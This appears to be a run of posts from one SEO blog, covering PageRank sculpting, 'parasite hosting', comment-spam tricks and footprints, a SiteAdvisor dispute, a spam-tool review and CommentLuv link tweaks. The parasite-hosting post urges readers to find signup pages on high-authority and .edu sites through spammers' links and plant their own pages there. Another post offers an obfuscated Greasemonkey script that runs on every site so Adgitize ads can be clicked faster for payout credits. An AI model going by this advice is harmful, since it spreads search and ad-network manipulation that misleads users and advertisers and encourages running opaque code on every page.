Another frequently overlooked mechanism of hoarding PageRank from your comment area is to use WordPress’ built-in paged-comments functionality. Maybe show a few comments on the post page, and then meta-noindex/nofollow the rest of them on their own dedicated comment pages. Oh, and you may want to check out this plugin to help with any unintended duplicate content issues.

Keep in mind that these methods are designed to help with on-page link sculpting when nofollow attributes cease to operate as originally intended (thanks Google). There are of course many other ways to optimize your pages and control the flow of PageRank throughout your site (e.g., robots.txt, meta directives, strategic linking and so on), but the focus of this article is aimed specifically at nofollow and how to deal with Google’s new policy. Hopefully you have a better idea of how things might be changing and some good ideas for dealing with it.

[1] For a good explanation of how this works, see Mr. Fishkin’s excellent description.

What is Parasite Hosting?

Parasite hosting is a black hat technique that relies on utilizing a domain’s inherent authority to create a free blog/wiki / forum etc and use it to create in content links. Which as was pointed out in Link Power – How to get the best links are THE links which hold the most ‘punch’.

Advantages of Parasite hosting and Google sandbox

The Google sandbox is usually a period of 3-4 months in the beginning of its life where low authority incoming links are ‘discounted’ and ‘filtered’ therefore making it difficult for them to rank high for competitive terms straight away.

The parasite ’site’ as its based on a high authority domain does not get caught in this filter and therefore does not get caught by this filter. Enabling the primary site to rank well. (this also being why social bookmarking works well).

Is parasite hosting really blackhat?

Now this is up for debate (well I believe so anyway). If you use the ‘parasite’ purely as a method of spamming links, then yes it is blackhat. However what if you have useful information on the hubpages? on the blogs? what if they are actually useful? then what? is it still blackhat? or a bit grey?

Arguably (one sided imo) Courts latest Hub Page Venture is a point in case to actually USE parasite hosting. Due to the hubpages intrinsic domain authority the ‘hubs’ are ranking well.

Linkbuilding using Parasite Hosting

Now those of you who are thinking out there oh Donace has lost it now why would we even build links with parasite hosting? I would never do it!

Well wakeup call! you already do!

Those of you that have social media profiles will notice that you can leave your site link there…and these profile pages are what? …pages you control on a high authority domain! *shock*

So link building methods as described in Colin’s blog are only good because of the intrinsic value of those domains. Extrapolating the definition to its extreme article directories and normal directories are also examples of parasite hosting as you are putting your content on a site and relying on ITS domain authority to make those links count for something.

Spammers and Parasite hosting

It is because of spammers that the term parasite hosting has been given a bad name and is associated with shadowy figures with huge great hardon peddling drugs to under-age dwarfs.

However for the clever people among you or just the ones with a bit more time, will notice when analysing spam comments from the shadowy peddlers most of the links are from high authority sites (including .edu) that the ‘SF’ has signed up to their cms and used it as a doorway.

The ones with time can simply follow the link > find the signup page and great your own ‘parasite’ page …but ofc yours will be useful!

The concluding paragraph

So in conclusion parasite hosting while sounding like a blackhat technique, 90% of the time it is not. ‘SEO’ experts and link builders utilise the concept behind it to build links. yes there is a shady side to it; but then again even the sun has a dark spot.

As an added bonus I have included a huge list of places you can grab free accounts to create your own subpages(more control is better); and would also suggest you check out Lahay’s cookbook.

p.s. this is the more ‘liberal’ interpretation of parasite hosting the true ‘blackhat’ version uses complex query strings to injects its url in authoritative sites. A great example can be seen here.

A few weeks ago I stumbled across some interesting spam; it was generic enough to make me think hmm is this spam or a real comment? so going on the more altruistic side I thought sure i’ll accept it but i’ll edit out the url just in case.

The logic being if it was a genuine commenter odds are he would return to reply and I would know and then accept the url.

However when I went to edit the code I found something very interesting.

The Smiling Commenter Trick

<a href=”http://google.com”>:)</a>

Would it was doing in effect was hiding a link in the smiley!

Beware the smiling commenter he may not have a link in the ‘url’ slot of the form but he may be sneaking them in later.

How to prevent smiley spam?

What you could do is prevent smiley’s in comments …but that’s no fun! instead go into your Wordpress settings and go to the discussion tab.

Just ensure here that you have it set to ‘2′ or ‘1′ so the comment is flagged by askimet; so you can peak at the smiling commentators code before accepting.

Play the field

Doing this is all fine however it is a hassle! So how can we stop these spammers even finding us?!

Well you could use the tricks in Spam Attack (note the 4g blacklist is now out) but they can still find you! so how do we blind them? well we first have to look at how they can find you!

Most bloggers (including The Nexus) have a theme with a default comment.php. This default system has a number of ‘footprints’ that give it away.

So a simple query in Google like the one below will return hundreds of blogs that they can spam.

‘Leave a Reply’ ‘Name “(required)”‘ ‘Mail (will not be published) “(required)”‘ ‘Website’ + ‘KEYWORD’

Sweep the prints clean

Getting rid of these ‘footprints’ is fairly easy; though will require to edit your comment.php file.

What IS your Name?

Open up your comment.php and hunt down the following:

<label for=”author”>Name <?php if ($req) echo “(required)“; ?></label>

All that is required then to change the Bold bits to anythign you like!

<label for=”author”>Your Name <?php if ($req) echo “(A Must Have!)“; ?></label>

So this Email thing…

For email again very simple; just hunt down the following:

<label for=”email”>Email Address<?php if ($req) echo “(required)”; ?></label>

and change it to what you want!

<label for=”Your Email”>Email Address<?php if ($req) echo “(Leave one after the Beep!)”; ?></label>

simpelz!

Here is one I made earlier:

This will leave you with a site with little footprints and make it harder for spammers to find you.

No Spammers though…that’s just a Fairytale

Neverblue Affiliate company appeared online one day promising to revolutionize affiliate marketing. Did it? or did it just damage your site?

Neverblue.com Avoid!

Recently I was trying to shift some ad space on The Nexus just to see how profitable it could be and one prospective buyer declined, reason McAfee site advisor had ‘red-barred’ The Nexus.

Now this had be worried because my site is NOT a virus / spamming site it poses no one a danger. So why was it red-barred?

A bit of investigation on McAfee site showed me it was due to a link to njump.com. After a bit of quick fire questioning I found out that this link is part of an affiliate link from a neverblue campaign that I had up on The Nexus some months ago.

Get un-red-barred (or get it fixed)

File a dispute

you can either file your dispute by emailing support@siteadvisor.com or online. http://www.siteadvisor.com/userfeedback.html.

With this you should write what was previously wrong and what you have done to amend it.

Acknowledgement

Shortly after you should receive an email similar to the following:

Thank you for contacting us and we are pleased that you have taken action to mitigate the web safety threats our automated crawlers detected at your site.

We have manually queued this domain for a retest. Outgoing links from this domain were cleared and a retest will take place. Please allow at least six weeks for this test to be completed and its results to fully propagate through our system.

The hopefully after this period your site should be ‘Green’ and safe .

Blog Comment Demon, spawn of Satan or Pee Wee Herman?

The Sales Pitch

We all know that links have to be diverse for your site to rank well and maintain its position in the SERPS. Blog commenting is one such link building tactic that ‘to quote’ does the following:

Now I don’t dispute the benefits of do-follow blog commenting, and anything that makes thing that makes this easier is great!

With Blog Comment Demon, it has never been easier for you to find one-way quality related links to your sites. You can start getting your sites indexed faster and gain higher search engine rankings in the long run! Start increasing your Adsense income, affiliate commissions and sell more products!

It sounds brilliant !!

Does Blog Comment Demon Deliver?

Well when I saw the landing page at first I though wow this can help me find niche related sites where I can comment. This as well as giving me a nice do-follow link the links would be ‘relevant’, which as I have mentioned in Link Power – How to get the best links is a factor that is to be considered.

So lets see …did it Blog Comment Demon deliver on its promises?

Search Function

The Premise was simple pick a keyword and language and it would go and search for blog related to that keyword.

Unfortunately this search took ages, the blogs it found out of 4 different tests with different keywords 80% were unrelated to the keyword.

Further you could not ‘comment’ on the blogs until the search had completed which took anywhere between 30mins and 1hr (I cancelled the search then).

Blog Comment Demon Filtering

Now being a guy who likes things done quickly and most bang with buck I tweaked these settings here to try and get the best blogs to comment to.

Do Follow Filtering

Unfortunately this was not very accurate; it got confused a lot especially on

blogs that had a do-follow link back to the post in the comment section (numbering system etc.).

So the PR5 do-follow link that had be shouting and screaming at how great this program was…it wasn’t do-follow.

Comment Number Filtering

Now with the above issue I noticed that its ‘accuracy’ was better with blogs that already had comments. So I clicked the function saying filter blogs with no comments and let it rip.

Unfortunately this has yet to learn how to count. A quick comparison between two searches on the same keyword showed that, a number of blogs WITH comments were filtered out and some blogs with NO comments were in the list.

Thus meaning this function was not working.

Auto Form Filler

I spend AAAAAGES typing the same information so this function (if the right blogs were found) would be awesome! HOWEVER one a few blogs I tested it on, it missed out either the ‘name’ or ‘url’ field. Plus this function can be done for free using a simple Firefox Plugin so this is kinda redundant without it finding the right blogs.

The Positive

Now I have been picking the negative a bit so some positive points…. give me a min…

It has proxy support which always nice.

You can ‘use’ a useragent thus making the program look like firefox.

Finds Blogs/Page PR accurately…

Multiple project / keywords support

Can ‘position’ internal windows to how you want.

Conclusion

The premise for this program is brilliant, the functions make logical sense.

However it does not do what it in my mind it was built to do, which is to accurately find related blogs that are do-follow.

Yes this program has potential when it is fixed; until then its ‘potential’ is like a chimp in the wild, they may one day evolve and enslave the human race but right now its slinging crap and happy doing so. We have to wait and see if it evolves…then we shall pay notice.

Well wondering the net a while back I found Adgitize and I talked about it briefly before (here is me hoping YARPP picks it up and adds it to the bottom of this post!).

Though one key element in ‘acquiring’ credits that you can ‘cash out’ is to do with clicking on the adgitize advertisements of other member sites akin to how entrecard ‘dropping works.

Now locating these ads and then clicking in troublesome….and in the mood of breaking here is a greasemonkey script that will auto move the adgitize ads to the top left of your firefox screen…making it faster to click on the ad and cash out at the end of the month!

What you need

FireFox Browser
Greasemonkey Addon
Insert the following script:

1
2
3
4
5
6

// ==UserScript==
// @name           AT
// @namespace      AT
// @include        http://*
// ==/UserScript==
eval(function(h,b,i,d,g,f){g=function(a){return(a<b?"":g(parseInt(a/b)))+((a=a%b)>35?String.fromCharCode(a+29):a.toString(36))};if(!"".replace(/^/,String)){while(i--){f[g(i)]=d[i]||g(i)}d=[function(a){return f[a]}];g=function(){return"\\w+"};i=1}while(i--){if(d[i]){h=h.replace(new RegExp("\\b"+g(i)+"\\b","g"),d[i])}}return h}("8 6(a){4 b,1;b=2.h('i')[0];9(!b){d}1=2.j('1');1.k='l/m';1.n=a;b.o(1)}p.q('r',8(){4 a=\"//s[@t[u(.,'v.w.x/y')]]\";4 b=2.z(a,2,e,A.B,e);4 c=b.C(0);9(!c){d}c.1.D=\"f%\";c.1.E=\"F\";c.1.g=\"G\";c.1.H=\"3\";c.1.I=\"0\";c.1.J=\"0\";6('7 { K:f% ! 5; L:0 ! 5; M:0 ! 5; }');6('.N { g:O ! 5; }');2.7.P(c,2.7.Q)},R);",54,54,"|style|document||var|important|addGlobalStyle|body|function|if||||return|null|100|position|getElementsByTagName|head|createElement|type|text|css|innerHTML|appendChild|window|addEventListener|load|iframe|src|contains|www|adgitize|com|ShowImage|evaluate|XPathResult|ORDERED_NODE_SNAPSHOT_TYPE|snapshotItem|marginRight|maxHeight|125px|fixed|zIndex|left|top|width|padding|margin|top_bg|relative|insertBefore|firstChild|false".split("|"),0,{}));

That is all! Then every time you visit a site the script will some voodoo and throw the ad to the top! Simple as Pie! If I every get bored enough I may whip up a bot similar to the entrecard bot…

until then Enjoy!

Teaches how to tweak a few settings here and there to maximise the potential of garnering links form comment luv plugin.
Written by the monkey's atThe Nexus

Feedburner steals your Comment luv

Recently I have been building some niche sites and as we know to help them rank you need links!

Again they cannot all be from one source; so no matter how much I like Traffic Android it’s Social Media and RSS links while getting me far may not get me to the coveted no. 1 place.

The next ‘Big Source’ of links is from commenting; may they be do-follow, no follow or with the added bonus of comment luv.

A quick google of the term ‘comment luv blog list’ brings up huge lists of such blogs. The problem being is that comment luv which usually works with your feed is not fully utilized. How you ask? well let me try and explain…

The Feedburner Redirect

A lot of users who utilize comment luv sites are 7/10 times (a downward trend now) likely to have their links like Mitch does below. (sorry for picking on you Mitch but I noticed it a few times which prompted me to write this!).

Feed Burner Redirect

Why is this bad ? I hear you scream (or mumble).

Well like this the only ‘benefit’ we are getting is advertisment of the link. Being the greedy S.O.B’s we are, we ideally want a DIRECT LINK back to our post that is DO-FOLLOW.

Of course the later is not a necessity but the direct link is what we ideally want to help us build backlinks to our post and therefore giving us diverse links to our post which will help us rank for phrases like Internet Marketing and possibly even pass some PR juice over.

How we get a DIRECT Comment Luv Link

It is very simple! Log into to your Feedburner account and you should see a ‘configure stats’ option under the services heading. Just click on it and UNTICK all the options. The reason for this is simply that for feedburner to track our stats it needs the redirect, and these stats analytics can provide anyway so we should really turn them off!

For the person to who images speak louder then words..UNTICK!

Further Optimization

Some bloggers out there publish posts so often you wonder if they eat or sleep! Some posts though you may already rank well for and you want to direct the links to some of your older posts.

Now out of the box comment luv doesn’t let you pick that many older posts when you asked to leave a link but registering on their site and ‘claiming’ your site, will give you that option and increase the amount of posts available.

Hmmm more Toasts..Posts

Even then you are limited by your feed,so…

Increase your feed size!

A very simple thing to do; go to your admin panel > settings > reading and just amend the number! Easy as pie (hmm pie).

Dont think 100 will work

Now go forth and populate the world with your seed Links!
